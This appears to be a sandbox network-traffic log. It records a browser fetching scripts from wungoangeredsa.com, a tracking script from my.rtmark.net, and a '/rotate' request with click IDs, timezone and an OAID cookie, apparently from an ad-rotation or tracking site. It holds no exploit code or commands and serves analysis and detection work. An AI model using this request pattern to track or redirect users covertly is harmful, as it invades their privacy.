Source: global trafficHTTP traffic detected: GET /_next/static/chunks/27da6a71c55717fa-1736072686539.1f230f14e978af7b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/40ab15743262ea54-1736072686539.eaaf74440aba84a2.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8d3443188ef1fee1-1736072686539.437b26541c6a284a.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/b88eab57f2676fbf-1736072686539.7179d464977285be.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2d343433e1c8b3ac-1736072686539.2dbd5874240e877f.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/87040b3d41357533-1736072686539.6a095265338b008b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/81cd5f76d0de6e9e-1736072686539-dd624469daa80f67.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8d3443188ef1fee1-1736072686539.437b26541c6a284a.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/27da6a71c55717fa-1736072686539.1f230f14e978af7b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1c02c3e681ea9f6d-1736072686539-ebf163de3da5e125.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4d859cac5ba89327-1736072686539-7c9f685438bac6d8.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4f5ddda985b24b74-1736072686539-595e9d9ff8fe596a.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/40ab15743262ea54-1736072686539.eaaf74440aba84a2.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3cacc58ea516fe6f-1736072686539.4d666b3ce7dcd66f.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/b88eab57f2676fbf-1736072686539.7179d464977285be.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/f11a4c032471831f-1736072686539-df6b842f2183863b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/87040b3d41357533-1736072686539.6a095265338b008b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/3ufPxZgwc9gMArDis_san/_buildManifest.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2d343433e1c8b3ac-1736072686539.2dbd5874240e877f.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/81cd5f76d0de6e9e-1736072686539-dd624469daa80f67.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/3ufPxZgwc9gMArDis_san/_ssgManifest.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1c02c3e681ea9f6d-1736072686539-ebf163de3da5e125.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4d859cac5ba89327-1736072686539-7c9f685438bac6d8.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4f5ddda985b24b74-1736072686539-595e9d9ff8fe596a.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gid.js?userId=1zy28050kovbfyyc4yz4gsq62pkmaxhb HTTP/1.1Host: my.rtmark.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wungoangeredsa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/3ufPxZgwc9gMArDis_san/_buildManifest.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/3ufPxZgwc9gMArDis_san/_ssgManifest.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/comments-empty-user.c37f32b6.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/ac5595402e335eea-1736072686539.3cfdc57f0372e5e9.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/c2f96434bddabe6e-1736072686539.3a22e244b1dff92a.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/cce078a36fb49fc2-1736072686539.a4de873c342c784d.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/dbb80ba394719d25-1736072686539.0157f5525bb5ad80.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/946b720792ec3642-1736072686539.5fb83dbc00ce11a5.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/f11a4c032471831f-1736072686539-df6b842f2183863b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stattag.js HTTP/1.1Host: cdntechone.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/icon-survey.86b78ce0.svg HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/comments-empty-user.c37f32b6.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/cce078a36fb49fc2-1736072686539.a4de873c342c784d.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /rotate?var=8645117&ymid=615-538bd0d9&click_id=900090192959910233&rhd=1&var_3=M7456757949717807127&oaid=1zy28050kovbfyyc4yz4gsq62pkmaxhb&os_version=10.0.0&btz=America%2FNew_York&bto=300&zz=4292526%3B5128285%3B4326653%3B4949467%3B5381235%3B8372416%3B5381316%3B8372719%3B5381307&uid=1zy28050kovbfyyc4yz4gsq62pkmaxhb HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/265d60a91fd3d6b8-1736072686539.748820502fe4525b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/ac5595402e335eea-1736072686539.3cfdc57f0372e5e9.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/621e8925e817e462-1736072686539.fe6846fd6e13d76b.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/d6be0b89fa7aeaa3-1736072686539.cf6cc9096c69f504.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/593553c1eec4cbba-1736072686539.97c2038dc0b2daf0.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/946b720792ec3642-1736072686539.5fb83dbc00ce11a5.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
